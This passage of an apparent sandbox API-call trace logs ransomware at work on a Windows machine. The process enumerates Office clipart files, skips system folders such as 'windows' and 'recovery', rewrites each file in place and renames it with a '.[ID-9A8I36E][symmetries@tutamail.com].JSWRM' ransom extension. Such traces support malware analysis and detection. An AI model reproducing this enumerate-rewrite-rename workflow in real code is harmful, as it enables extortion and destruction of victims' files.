(lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318804.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318804.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0089.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0089.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0089.493] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28be, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0318810.WMF", cAlternateFileName="")) returned 1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2=".") returned 1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2="..") returned 1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2="...") returned 1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2="windows") returned -1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2="recovery") returned -1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2="perflogs") returned -1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2="documents and settings") returned 1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2="system volume information") returned -1 [0089.493] lstrcmpiW (lpString1="J0318810.WMF", lpString2="msocache") returned -1 [0089.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0089.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318810.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318810.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0318810.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0089.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0089.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318810.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318810.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0318810.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0089.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0089.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318810.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.495] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10430) returned 1 [0089.495] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x28b0) returned 0x24d210 [0089.495] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x28b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x28b0, lpOverlapped=0x0) returned 1 [0089.497] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.497] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x28b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x28b0, lpOverlapped=0x0) returned 1 [0089.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.497] CloseHandle (hObject=0x314) returned 1 [0089.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0089.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0089.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0089.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0089.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0089.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.498] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318810.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318810.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0089.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.499] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24d7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0321179.JPG", cAlternateFileName="")) returned 1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2=".") returned 1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2="..") returned 1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2="...") returned 1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2="windows") returned -1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2="recovery") returned -1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2="perflogs") returned -1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2="documents and settings") returned 1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2="system volume information") returned -1 [0089.499] lstrcmpiW (lpString1="J0321179.JPG", lpString2="msocache") returned -1 [0089.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0089.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0321179.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0321179.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0321179.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0089.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0321179.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0321179.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0321179.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0321179.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.500] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9431) returned 1 [0089.500] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x24d0) returned 0x24d210 [0089.500] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x24d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x24d0, lpOverlapped=0x0) returned 1 [0089.502] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.502] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x24d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x24d0, lpOverlapped=0x0) returned 1 [0089.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.502] CloseHandle (hObject=0x314) returned 1 [0089.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0089.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0089.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0089.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0089.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.503] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0321179.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0321179.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.503] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ff8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0324694.WMF", cAlternateFileName="")) returned 1 [0089.503] lstrcmpiW (lpString1="J0324694.WMF", lpString2=".") returned 1 [0089.503] lstrcmpiW (lpString1="J0324694.WMF", lpString2="..") returned 1 [0089.503] lstrcmpiW (lpString1="J0324694.WMF", lpString2="...") returned 1 [0089.503] lstrcmpiW (lpString1="J0324694.WMF", lpString2="windows") returned -1 [0089.503] lstrcmpiW (lpString1="J0324694.WMF", lpString2="recovery") returned -1 [0089.503] lstrcmpiW (lpString1="J0324694.WMF", lpString2="perflogs") returned -1 [0089.503] lstrcmpiW (lpString1="J0324694.WMF", lpString2="documents and settings") returned 1 [0089.504] lstrcmpiW (lpString1="J0324694.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.504] lstrcmpiW (lpString1="J0324694.WMF", lpString2="system volume information") returned -1 [0089.504] lstrcmpiW (lpString1="J0324694.WMF", lpString2="msocache") returned -1 [0089.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0089.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0324694.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0324694.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0324694.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0089.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0324694.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0324694.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0324694.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0089.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0089.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324694.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.504] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12280) returned 1 [0089.504] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ff0) returned 0x24d210 [0089.504] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2ff0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2ff0, lpOverlapped=0x0) returned 1 [0089.507] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.507] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2ff0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2ff0, lpOverlapped=0x0) returned 1 [0089.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.507] CloseHandle (hObject=0x314) returned 1 [0089.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0089.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0089.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0089.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0089.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0089.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0089.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324694.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324694.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0089.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0089.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0089.508] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e7e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0324704.WMF", cAlternateFileName="")) returned 1 [0089.508] lstrcmpiW (lpString1="J0324704.WMF", lpString2=".") returned 1 [0089.508] lstrcmpiW (lpString1="J0324704.WMF", lpString2="..") returned 1 [0089.508] lstrcmpiW (lpString1="J0324704.WMF", lpString2="...") returned 1 [0089.508] lstrcmpiW (lpString1="J0324704.WMF", lpString2="windows") returned -1 [0089.508] lstrcmpiW (lpString1="J0324704.WMF", lpString2="recovery") returned -1 [0089.508] lstrcmpiW (lpString1="J0324704.WMF", lpString2="perflogs") returned -1 [0089.509] lstrcmpiW (lpString1="J0324704.WMF", lpString2="documents and settings") returned 1 [0089.509] lstrcmpiW (lpString1="J0324704.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.509] lstrcmpiW (lpString1="J0324704.WMF", lpString2="system volume information") returned -1 [0089.509] lstrcmpiW (lpString1="J0324704.WMF", lpString2="msocache") returned -1 [0089.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0089.509] WideCharToMultiByte (in: 